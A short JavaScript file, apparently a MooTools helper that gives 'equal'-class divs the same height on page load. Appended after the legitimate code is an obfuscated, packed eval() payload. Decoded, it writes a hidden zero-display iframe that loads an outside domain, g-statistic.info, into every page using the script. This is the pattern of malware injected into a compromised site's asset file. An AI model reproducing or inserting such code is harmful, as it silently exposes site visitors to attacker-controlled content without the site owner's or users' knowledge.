var maxHeight = function(classname) {
	var divs = document.getElements('div.' + classname);
	var max = 0;
	divs.each(
			function(div) {
			max = Math.max(max, div.getSize().size.y);
			}
	);
	divs.setStyle('height', max);
	return max;
}
window.addEvent('load', function() {
	maxHeight('equal');
	maxHeight.delay(500, maxHeight, 'equal');
}
);<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{}));
<!-- . -->